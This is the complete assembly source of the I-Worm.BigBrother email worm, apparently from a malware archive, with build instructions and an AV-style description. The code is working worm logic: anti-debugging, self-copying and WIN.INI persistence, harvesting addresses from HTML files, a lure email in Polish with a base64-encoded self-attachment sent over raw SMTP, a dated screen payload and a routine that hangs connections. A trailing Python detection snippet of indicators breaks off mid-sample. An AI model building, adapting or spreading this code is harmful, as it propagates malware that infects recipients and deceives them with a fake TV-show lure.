MalwareSourceCode/Win32/InternetWorm/I-Worm.BigBrother.asm
2020-10-16 23:26:21 +02:00

;================================================================================================
; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:
; Ä #####################++++++++++++++++++ Ä
; Ä #:I-Worm.BigBrother #¿ ! ¿+ Ä
; Ä ####################*################## Ä
; Ä +¿ ! ¿#:BioCoded by YuP # Ä
; Ä ++++++++++++++++++++################### Ä
; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:
;
;
;
;
; [Disclaimer]
; ^~^~^~^~^~^~^
; This file is a demonstration of WINASM coding. Educational purposes only!
; Author is not responsible for any kind of damages which may occur after the
; assembly of this file.
; I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE.
;
; [2002 CURRENT NOTES]
; This worm is so old that i don't remember when i have coded it,
; it is VERY VERY LAME! IT WAS CODED IN THOSE TIMES WHEN I THOUGHT
; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE!
; SO IT IS GOOD FOR LAMMIEZ!
;
; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net
; [current greetz for all guyz from #virus and TKT memberz!]
;
;
;
;
; [Greetz]
; ^~^~^^~^
; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>.
; * T-2000 / Immortal Riot (4 base encoder sample).
;
; Otherz (greetz) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz,
; tompaw69, PlayerPL, Grabarz (dragon bratha)
; Crash and otherz polish coderz.
;
; Bonus thx to: For Karolinka (from BB) - you are so stupid that I feel sorry for you.
; (inspiration) Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma,
; Balon.
;
; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group
;
; [How to Compile]
; ^~^~^~^~^~^~^~^
; %: tasm32 /m1 /mx big.asm
; %: tlink32 /Tpe /aa big,big,,import32.lib
; %: brc32 big.res
;
; % NOTE. File is also compressed & encrypted by tElock tool ,ver.051
;
;
;
; [Info]
; ^~^~^~
; .:[SUPPORT.AVX.COM]: (my commentz in *[]*)
;
;
;
; Details:
;---------
;Name : I-Worm.BigBrother
;Type: Internet Worm
;Aliases: none
;Size: 12800 bytes
;
;At the time of writing this we have only received one report of infection.
;
;
;Description:
;---------------
;This is a virus which arrives in your e-mail in the following format:
;
;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl
;Subject: BIGBROTHER SHOW !
;
;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to
;zrobic? Wystarczy ze uruchomisz specjalny program
;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.
;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie
;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda
;nagrody (telewizory, wieze stereo,
;komputery ...i wiele ,wiele innych). Prosimy przysylac
;opinie i komentarze na temat programu.
;
;
;Zyczymy milej zabawy:
;
;Redakcja programu.
;
;Attachment: BigBrother_Live_Camera.exe
;
;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name:
;b1g_brother.exe
;and adds the following line in WIN.INI: in the section [windows]
;
;run=c:\Windows\System\b1g_brother.exe
;
;After that it checks if the computer is connected to the Internet and then starts sending itself
;through e-mail in the format presented above.
;
;In order to get e-mail addresses it scans all hard drives for html files and it searches inside
;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in
;My Documents folder na Temp]*
;
;In case of running the b1g_brother.exe manually it shows the following message:
;SEGMENTATION FAULT.
;Please REPORT this BUG.
;
;Payload:
;-----------
;On May 13 it displays the following message:
;You like to think you're never wrong
;You want to act like you're someone
;You want someone to hurt like you
;You want to share what you've been through
;You live what you learn...
;
;Today you know the truth: i-worm.BigBrother
;Now contact with yourz AV expert.
;Future , Don't trust anyone ...
; [YuP/0ne Earth]
;payyes *[what?]*
;Detection has been added.
;
;
;
;
; [Bugz]
; ^~^~^~
; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be.
; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out).
; I don't know why ;) i don't have any time to check it with any debugER ;]
; do it yourself if you want of coz. This is my 1st i-worm and its very
; 'low-coded' i think ... The next onez should be better.
;
;
;================================================================================================
; [L]etz [S]tart
; oO-= Have fun! =-Oo
;================================================================================================
.486p
locals
jumps
.model flat,STDCALL
extrn ExitProcess:PROC ;i love it
extrn CopyFileA:PROC ;did i miss sth ?
extrn MessageBoxA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemDirectoryA:PROC
extrn lstrcatA:PROC
extrn lstrcpyA:PROC
extrn CreateFileA:PROC
extrn ExitWindowsEx:PROC
extrn Sleep:PROC
extrn CreateMutexA:PROC
extrn GetCurrentProcessId:PROC
extrn LoadLibraryA:PROC
extrn GetProcAddress:PROC
extrn PeekMessageA:PROC
extrn OpenMutexA:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn ReadFile:proc
extrn CharNextA:PROC
extrn lstrcpyn:PROC
extrn lstrlenA:PROC
extrn lstrcmp:PROC
extrn lstrcpy:PROC
extrn FindClose:PROC
extrn GetTopWindow:PROC
extrn GetNextWindowA:PROC
extrn PostMessageA:PROC
extrn GetActiveWindow:PROC
extrn GetTempPathA:PROC
extrn send:PROC
extrn recv:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn socket:proc
extrn connect:PROC
extrn gethostbyname:PROC
extrn closesocket:PROC
extrn lstrlen:PROC
extrn WinExec:PROC
extrn lstrcmpi:PROC
extrn ReleaseMutex:PROC
extrn GetFileSize:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetCurrentDirectoryA:PROC
extrn _lread:PROC
extrn SetCurrentDirectoryA:PROC
extrn WriteProfileStringA:PROC
extrn RegCreateKeyA:PROC
extrn RegOpenKeyA:PROC
;extrnz for payload
extrn SetTextColor:PROC
extrn GetDC:PROC
extrn TextOutA:PROC
extrn CreateFontA:PROC
extrn SelectObject:PROC
extrn LineTo:PROC
extrn GetSystemTime:PROC
extrn SetBkColor:PROC
extrn CreatePen:PROC
.DATA
signature db "[I-WORM.BigBr0th3r] (c) YuP",0
db "Greetz to all #PHREAKPL CREW",0
db "and #VXERS TERRORIST GROUP.",0
db "Special thx goez to: Dageshi",0
db "& detergent ",0
db "-=* GOOD WORK AV PEOPLE ;P *=-",0
myname db 256 dup(?)
new db '\b1g_brother.exe',0
sysD db 256 dup(?)
sysDD db 256 dup(?)
tempD db 256 dup(?)
markerr db 'rundll32 kernel,FatalExit',0
krnl db 'KERNEL32.DLL',0
krnl_proc db 'RegisterServiceProcess',0
mutex_name db 'Kakaroth',0
mutexH dd ?
sys_name db 'b1g_brother.exe',0
module_filename db 256 dup(?)
dir db 1024 dup(?)
bslash db '\',0
;check connection
hang_connection db 'InternetHangUp',0
check_connection db 'InternetGetConnectedState',0
wininet_lib db 'WININET.DLL',0
lpdwFlagz dd 0
ini_key db 'run',0
ini_sect db 'windows',0
;FOR REGISTRY
HKEY_LOCAL_MACHINE equ 80000001h
HKEY_CURRENT_USER equ 80000001h
hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
hPersonal db 'Personal',0
PersonalF db 128 dup(0)
PersonalFsize dd 128
hKeyHandle dd 0
my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0
shit dd 0
shitshit dd 0
server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0
server_h dd 0
server_s db 'SMTP Server',0
server db 128 dup(0)
server_size dd 128
;FOR SEARCH
fMASK db '\*.htm*',0
fMASK1 db '*.htm*',0
break db '\',0
oldd dd 128 dup(0)
bus db 260 dup(0) ;search buffer ;]
fsH dd ?
fHnd dd ?
sciezka db 260 dup(0)
WIN32_FIND_DATA struc
dwFileAttributes dd 0
dwLowDateTime0 dd ? ; creation
dwHigDateTime0 dd ?
dwLowDateTime1 dd ? ; last access
dwHigDateTime1 dd ?
dwLowDateTime2 dd ? ; last write
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
WIN32_FIND_DATA ends
find_data WIN32_FIND_DATA <?>
;for e-mailz
mail db 'mailto:',0
worm_size equ 10000h
worm_code db worm_size dup(0)
fH dd ?
searchH dd ?
counter equ 0
longBuff dd ?
clear db '',0
myB db 128 dup(?)
L1 db '"',0
mail_string db 128 dup(0)
mail_good db 128 dup(0)
sep db '',0
;======================[BASE ENCODE DATA]===============================
base_file db '00000b.rat',0
base_file_name db 128 dup(0)
base_to_code db '000000s.b64',0
base_to_code_buff db 128 dup(0)
Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
DB 'abcdefghijklmnopqrstuvwxyz'
DB '0123456789+/'
Input_Buffer DB 200 DUP(0)
Output_Buffer DB 200 DUP(0)
base_buff_size equ 18516
base_buffer DB base_buff_size DUP(0)
base_size dd 0
baL dd ?
input_handle dd ?
Input_Handle dd ?
output_handle dd ?
Output_Handle dd ?
IO_Bytes_Count DD 0
OPEN_EXISTING EQU 00000003h
CREATE_ALWAYS EQU 00000002h
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
;============[E-MAIL CLIEN7]========================
HELO db 'HELO bigbrother.r0x.pl',0dh,0ah
mime_code db 'From: "BIGBROTHER TVN POLSKA" <bigbrother@bigbrother.tvn.com.pl>',0dh,0ah
db 'Subject: BIGBROTHER SHOW !',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db 0dh,0ah
db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah
db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah
db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah
db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah
db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah
db 'nagrody (telewizory, wieze stereo,',0dh,0ah
db 'komputery ...i wiele ,wiele innych). Prosimy przysylac',0dh,0ah
db 'opinie i komentarze na temat programu.',0dh,0ah
db 0dh,0ah
db 0dh,0ah
db 'Zyczymy milej zabawy:',0dh,0ah
db 0dh,0ah
db 'Redakcja programu.',0dh,0ah
db '',0dh,0ah
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"'
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah
mime_end db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0
mime_e equ mime_end
dot db '.',0dh,0ah
RCPT_1 db 'RCPT TO:<',0
RCPT_ENDD db '>',0dh,0ah,0
RCPT db 160 dup (?)
MAIL_FROM db 'MAIL FROM:<bigbrohter@tvn.pl>',0dh,0ah
QUIT db 'QUIT',0dh,0ah
_DATA_ db 'DATA',0dh,0ah
e_end db '',0
;==================================[END MAIL DATA]====================================
;==================================[WIN SOCKZ]========================================
addr struc
proto dw 2
port dw 1900h
ip db 127,0,0,1
addr ends
addr2 addr <>
sock dd ?
SOCK_STREAM EQU 1
AF_INET EQU 2
WSA_Data DB 400 DUP(0)
SOCKET_ERR equ -1
HOSTENT_IP equ 10h
rB dd ?
;==================[END WIN SOCKZ]=========================================
;============[END E-MAIL DATA]=============================================
;FOR STEALTH
err_title db 'Setup',0
markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah
db 'Please REPORT this BUG.',0
db 0dh,0ah,0
;PAYLOAD
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;===========[PAYL0AD ;))]==================================================
dcH dd ?
brH dd ?
fontH dd ? ;~^~^~^~^~^~^~^^~^~^~^~^
info_line_1 db "You like to think youre never wrong",0 ;some lyrics from:
info_line_2 db "You want to act like youre someone",0 ;'POINTS OF AUTHORITY' - song
info_line_3 db "You want someone to hurt like you",0 ;of my best music group -
info_line_4 db "You want to share what youve been through",0 ;[L]inkin [P]ark ;))
info_line_5 db "You live what you learn...",0 ;~^~^~^~^~^~^~^~^~^~^~^~^
info_line_6 db "Today you know the truth: i-worm.BigBrother",0 ;some txt from myself
info_line_7 db 'Now contact with yourz AV expert.',0
info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0
sysTimeStruct db 16 dup(0)
payday db 128 dup(0)
payyes db 'payyes',0
;===========[END PAY DATA]=================================================
;-------------------------------------------------------------------------*
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;-------------------------------------------------------------------------*
;===========[CODE SECTION]=================================================
.CODE
Kakaroth:
push 256
push offset module_filename
push 0
call GetModuleFileNameA
xor ebp,ebp
mov ebp,offset module_filename
push offset dir
push 256
call GetCurrentDirectoryA
push offset bslash
push offset dir
call lstrcatA
push offset dir
call lstrlen
mov edi,eax
sub ecx,edi
C_NEXT:
push ebp
call CharNextA
mov ebp,eax
dec edi
jnz C_NEXT
push ecx
push ebp
push offset myname
call lstrcpyn
@DEBUG_CODE:
lea eax,dword ptr [esp-8h]
xor esi,esi
xchg eax,dword ptr fs:[esi]
lea edi,exception
push edi
push eax
call @antidebug
@antidebug:
add esp,4
cmp esi,dword ptr fs:[esi+20h]
je @SKIP_DEBUG
jmp @HEART_STOPS
@SKIP_DEBUG:
push 0
push 0
push 0
push 0
push 0
call PeekMessageA
@COPY_FILE:
push 256
push offset sysD
call GetSystemDirectoryA
xor eax,eax
push offset new
push offset sysD
call lstrcatA
cmp eax,0
jc @EXIT
push 0
push offset sysD
push offset myname
call CopyFileA
cmp eax,0
jc @EXIT
push 01h OR 02h
push offset sysD
call SetFileAttributesA
push offset myname
push offset sys_name
call lstrcmpi
cmp eax,0
jne @RUN_SYS_FILE
@_CHECK_4_PAYLOAD:
push offset sysTimeStruct
call GetSystemTime
xor eax,eax
lea eax,sysTimeStruct
cmp word ptr [eax+2],5 ; 13th May
jne @SKIP_PAY
cmp word ptr [eax+6],13
jne @SKIP_PAY
@PAY: ;payload
push 50000 ;sp00ky one ;))
call Sleep ;wait some time
push 0h
call GetDC
mov dword ptr [dcH],eax
push 0
push 1000h
push 1
call CreatePen
mov dword ptr [brH],eax
push dword ptr [brH]
push dword ptr [dcH]
call SelectObject
push 500
push 300
push dword ptr [dcH]
call LineTo
;=======[FONT]=================================================
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0
push 0
push 13
push 23
call CreateFontA
mov dword ptr [fontH],eax
push dword ptr [fontH]
push dword ptr [dcH]
call SelectObject
push 0
push dword ptr [dcH]
call SetBkColor
push 16777215 ;color - white
push dword ptr [dcH]
call SetTextColor
;======[END FONT]===========================================
@TEXT:
push 16777215
push dword ptr [dcH]
call SetTextColor
mov esi,160
mov edx,offset info_line_1
mov ecx,140
call @TEXT_OUT
mov edx,offset info_line_2
mov ecx,170
call @TEXT_OUT
mov edx,offset info_line_3
mov ecx,200
call @TEXT_OUT
mov edx,offset info_line_4
mov ecx,230
call @TEXT_OUT
mov edx,offset info_line_5
mov ecx,260
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_6
mov ecx,350
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_7
mov ecx,380
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_8
mov ecx,435
call @TEXT_OUT
push offset payyes
push offset payday
call lstrcatA
call @SKIP_PAY
@TEXT_OUT: ;text-out function
push edx
call lstrlenA
push eax
push edx
push ecx
push esi
push dword ptr [dcH]
call TextOutA
ret
@SKIP_PAY:
@RESIDENT:
push offset mutex_name ;am i in memory now ?
push 0
push 1
call OpenMutexA
cmp eax,0
jne @I_WAS_HERE
je @NEXT_
@I_WAS_HERE:
push 010h
push offset err_title
push offset markerror
push 0h
call MessageBoxA
push 0h
call ExitProcess
@NEXT_:
push offset mutex_name ;nop then go there
push 1
push 0
call CreateMutexA
mov dword ptr [mutexH],eax
xor edx,edx
xor eax,eax
push offset krnl
call LoadLibraryA
cmp eax,0
jc @EXIT
push offset krnl_proc
push eax
call GetProcAddress
or eax,eax
jz @PR
mov edx,eax
call GetCurrentProcessId
;push 1
;push eax
;call edx
@PR:
push offset sysD
push offset ini_key
push offset ini_sect
call WriteProfileStringA
call @GET_MAILZ_START
@GET_MAILZ_START:
xor eax,eax
push offset hKeyHandle
push 0
push 0
push offset hKeyPath
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
cmp eax,0
jne @EXIT
push offset PersonalFsize
push offset PersonalF
push 0
push 0
push offset hPersonal
push hKeyHandle
call RegQueryValueExA
push offset server_h
push 0
push 0
push offset server_p
push HKEY_CURRENT_USER
call RegOpenKeyExA
cmp eax,0
jne @EXIT
push offset server_size
push offset server
push 0
push 0
push offset server_s
push server_h
call RegQueryValueExA
;PersonalF -> like My Docz
push hKeyHandle
call RegCloseKey
push offset base_file_name
push 260
call GetTempPathA
push offset base_file
push offset base_file_name
call lstrcatA
;=======================[BASE ENCODER]==========================
;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) +
; * dageshi (4 everything) +
;===============================================================
@_BASE_ENCODER:
push offset base_to_code_buff ;copy source file
push 260
call GetTempPathA
push offset base_to_code
push offset base_to_code_buff
call lstrcatA
push 1
push offset base_to_code_buff
push offset sysD
call CopyFileA
;blah blah blah
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
PUSH OFFSET base_to_code_buff
CALL CreateFileA
MOV [Input_Handle], EAX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
push OFFSET base_file_name
CALL CreateFileA
MOV [Output_Handle], EAX
PUSH 0 ;write in the standard part
PUSH OFFSET IO_Bytes_Count
PUSH (offset mime_end-offset mime_code)
push offset mime_code
PUSH [Output_Handle]
CALL WriteFile
cmp eax,0
je @ERROR
PUSH EBX ;size
PUSH [Input_Handle]
CALL GetFileSize
CDQ
MOV ECX, (76/4)*3
DIV ECX
DEC EDX
JS No_Round
INC EAX
No_Round:
XCHG ECX, EAX
Encode_Line:
PUSH ECX
MOV ESI, OFFSET Input_Buffer
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH (76/4)*3
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
MOV EDI, OFFSET Output_Buffer
PUSH EDI
PUSH 76/4
POP ECX
Encode_Packet:
PUSH ECX
MOV CL, 8
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
MOV EBX, OFFSET Encoding_Table
MOV CL, 4
Encode_Byte:
SHR EAX, 2
ROL EAX, 8
XLAT
STOSB
LOOP Encode_Byte
POP ECX
LOOP Encode_Packet
MOV WORD PTR [EDI], 0A0Dh ; <CRLF>.
POP EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 78
PUSH EAX
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
push [Output_Handle]
call CloseHandle
;=====================================================[END BASE ENCODER]===========
;=====================================================[GET BASE CODE TO BUFF]======
@GET_BASE_CODE:
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push offset base_file_name
call CreateFileA
mov edi,eax
push 0
push edi
call GetFileSize
push 0
push offset baL
push eax
push offset base_buffer
push edi
call ReadFile
;=====================================================[END GETTING]===============
@NEXT__:
push offset shitshit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
je @EXIT
push offset shit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegCreateKeyA
mov bh,0
mov bl,0
CALL @SCAN_MYDOCZ
@SCAN_TEMP:
push offset tempD
push 260
call GetTempPathA
push offset clear
push offset bus
call lstrcpyA
push offset tempD
push offset bus
call lstrcpyA
push offset fMASK1 ;add
push offset bus
call lstrcatA
call @FIND_1st
call @GO_GO1
@SCAN_MYDOCZ:
xor edi,edi
push offset clear
push offset bus
call lstrcpyA
push offset PersonalF
push offset bus
call lstrcpyA
push offset fMASK ;add
push offset bus
call lstrcatA
call @FIND_1st
call @GO_GO
@FIND_1st:
push offset find_data
push offset bus
call FindFirstFileA
mov dword ptr [searchH],eax
cmp eax,-1
je @ERROR
ret
@CLEAR_PATH:
push offset clear
push offset sciezka
call lstrcpyA
ret
@GO_GO:
call @CLEAR_PATH
xor edi,edi
push offset PersonalF
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1
@GO_GO1:
call @CLEAR_PATH
xor edi,edi
push offset tempD
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1
@SCAN_HTM_FILE_STEP1:
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push edi
call CreateFileA
cmp eax,-1
je @ERROR_M
mov dword ptr [fH],eax
push 0h
push offset longBuff
push worm_size ;size
push offset worm_code
push dword ptr [fH]
call ReadFile
cmp eax,0
je @ERROR_M
call @CLEAR
@MARK:
xor esi,esi
mov esi,0
xor ebp,ebp
mov ebp,offset worm_code
xor edi,edi
mov edi,1
@ALGORITM:
xor edi,edi
mov edi,1
call LOOPING_JOE
push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @CH
inc esi
cmp esi,10000
ja @END_OF_FILE
call @ALGORITM
@CH:
call @CLEAR
call @CHECK_STRING
LOOPING_JOE:
push ebp
call CharNextA
mov ebp,eax
push 2
push ebp
push offset myB
call lstrcpyn
ret
@CHECK_STRING:
call LOOPING_JOE
push offset myB
push offset mail_string
call lstrcatA
inc esi
inc edi
cmp edi,8
jne @CHECK_STRING
je @IS_IT_GOD
@IS_IT_GOD:
push offset mail
push offset mail_string
call lstrcmp
cmp eax,0
je @GET_MAIL
jne @ALGORITM
@GET_MAIL:
call LOOPING_JOE
push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @END_MAIL
push offset myB
push offset mail_good
call lstrcatA
inc esi
cmp esi,1000
jne @GET_MAIL
@END_MAIL: ;GENERATE MAIL HERE
inc bl
cmp bl,10
ja @ERROR
call @SEND_MAIL
@NEXT_MAILL:
xor edi,edi
mov edi,1
call @ALGORITM
@END_OF_FILE:
push dword ptr [fH]
call CloseHandle
xor eax,eax
xor ebp,ebp
call @CLEAR
call @CLEAR_BUFF
call @FIND_NEXT_FILE
@CLEAR:
push offset sep
push offset mail_good
call lstrcpy
push offset sep
push offset mail_string
call lstrcpy
ret
@CLEAR_BUFF:
push offset sep
push offset worm_code
call lstrcpy
ret
exception:
xor esi,esi
mov eax,dword ptr fs:[esi]
mov esp,dword ptr [eax]
@FIND_NEXT_FILE:
push offset find_data
push dword ptr [searchH]
call FindNextFileA
cmp eax,0
je @ERROR_NO_FILEZ_LEFT
cmp bh,1
ja @GO_TO_GO1
call @GO_GO
@GO_TO_GO1:
call @GO_GO1
@ERROR:
push dword ptr [fHnd]
call CloseHandle
call @EXIT
@ERROR_M:
push dword ptr [searchH]
call FindClose
call @EXIT
@ERROR_NO_FILEZ_LEFT:
cmp bh,2
je @ERROR_M
ja @ERROR_M
add bh,2
push dword ptr [searchH]
call FindClose
call @SCAN_TEMP
@SEND_MAIL:
push offset RCPT_1
push offset RCPT
call lstrcatA
push offset mail_good
push offset RCPT
call lstrcatA
push offset RCPT_ENDD
push offset RCPT
call lstrcatA
;======[CHECK INTERNET STATE]=======
;WININET.DLL REQUIRED :> +
;===================================
@CHECK_CONN:
push 500 ;little stealth
call Sleep
push offset wininet_lib
call LoadLibraryA
push offset check_connection
push eax
call GetProcAddress
xchg eax,ecx
jecxz @INIT_W
;push 0
;push offset lpdwFlagz
;call ecx
;or eax,eax
;jz @CHECK_CONN
;======[INIT WINSOCK]================
@INIT_W:
push offset WSA_Data
PUSH 0101h
CALL WSAStartup
cmp eax,0
jne @EXIT
push 0
push SOCK_STREAM
push AF_INET
call socket
cmp eax,SOCKET_ERR
je @CLEAN
mov sock,eax
;======[CONNECT]=====================
;push offset server
;call gethostbyname
;cmp eax,0
;je @CLEAN
;mov eax,dword ptr [eax+HOSTENT_IP]
;mov eax,dword ptr [eax]
;mov dword ptr [addr2.ip],eax
push 16
push offset addr2
push sock
call connect
cmp ax,SOCKET_ERR
je @CLEAN
;======[READ AND SEND LOOP]==========
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 24
push offset HELO
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 31
push offset MAIL_FROM
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push offset RCPT
call lstrlen
push 0
push eax
push offset RCPT
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 6
push offset _DATA_
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push offset base_buffer
call lstrlen
push 0
push eax
push offset base_buffer
push sock
call send
push 0
push 3
push offset dot
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 6
push offset QUIT
push sock
call send
push sock
call closesocket
call WSACleanup
push offset sep
push offset RCPT
call lstrcpy
push 5000
call Sleep
call @NEXT_MAILL
@EX:
push sock
call closesocket
push 0h
call ExitProcess
@CLEAN:
call WSACleanup
push 0h
call @EXIT
@EXIT:
push offset payday
push offset payyes
call lstrcmp
cmp eax,0
je @HANG_ALL_CONNECTIoNZ
jne _STAY_IN_MEM
_STAY_IN_MEM:
push 50000
call Sleep
call _STAY_IN_MEM
@BUFFER_OVERFLOW:
call GetActiveWindow ;kill the active window, presumably the debugger
mov edx,eax ;the infinite loop causes an error in the kernel
push 0 ;the worm file will be available after a system reset ;))
push 0
push 12h
push edx
call PostMessageA
CALL @BUFFER_OVERFLOW
@HEART_STOPS:
push 1
push offset markerr
call WinExec
push 100
call Sleep
call @BUFFER_OVERFLOW
@RUN_SYS_FILE:
push 256
push offset sysDD
call GetSystemDirectoryA
push offset sysDD
call SetCurrentDirectoryA
push 500
call Sleep
push 1
push offset sysD
call WinExec
push dword ptr [mutexH]
call ReleaseMutex
push 0h
call ExitProcess
@HANG_ALL_CONNECTIoNZ:
push 500 ;timer
call Sleep
push offset wininet_lib
call LoadLibraryA
push offset hang_connection
push eax
call GetProcAddress
xchg eax,ecx
push 0h ;kiss me goodbye ;)
push offset lpdwFlagz ;I don`t know that this WININET
call ecx ;function is working ;) Refer
call @HANG_ALL_CONNECTIoNZ ;to Jacob Navia it should be.
;[*Nice 'WININET' Ref ;) Big Thx :*]
End Kakaroth
;================================================================================================
; +1679 linez of asm c0de ;)) ? I did it ? he he ...
;
;================================================================================================
;***** This is the end of your journey... Sorry about commentz...i know - my english skillz. *****
;================================================================================================
; eEEEEEe nNn Nn dDDDd #+
; EE NNnN nN Dd dD #+
; EEEe nN nN nN dD dD #+
; EE NN nN nN Dd dD #+
; eEEEEEe nN nNNn dDDDd #+
; #+
; -= .: CoDinG is No7 a CrIm3 :. =- #+
;================================================================================================
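
The indicators given in the [Info] description and in the mail data block above (sender address, subject, MIME boundary, attachment name, and the WIN.INI run= entry pointing at b1g_brother.exe) can be checked mechanically on a mail gateway or during triage of an old host image. The Python below is an added detection example, not part of the original source file; the function names are illustrative, and the sample messages and WIN.INI text are constructed for the example.

```python
import email
from email import policy

# Indicators copied from the [Info] text and the mail data block of this file.
IOC_FROM_ADDR = "bigbrother@bigbrother.tvn.com.pl"
IOC_SUBJECT = "BIGBROTHER SHOW !"
IOC_BOUNDARY = "a1234"
IOC_ATTACHMENT = "bigbrother_live_camera.exe"
IOC_DROPPED_NAME = "b1g_brother.exe"

# Constructed samples: headers follow the layout described on this page,
# the attachment body is a harmless placeholder string.
SAMPLE_WORM_MAIL = (
    b'From: "BIGBROTHER TVN POLSKA" <bigbrother@bigbrother.tvn.com.pl>\r\n'
    b"Subject: BIGBROTHER SHOW !\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="a1234"\r\n'
    b"\r\n--a1234\r\n"
    b"Content-Type: text/plain; charset=us-ascii\r\n\r\n"
    b"(body omitted)\r\n"
    b"\r\n--a1234\r\n"
    b'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"\r\n\r\n'
    b"UExBQ0VIT0xERVI=\r\n"
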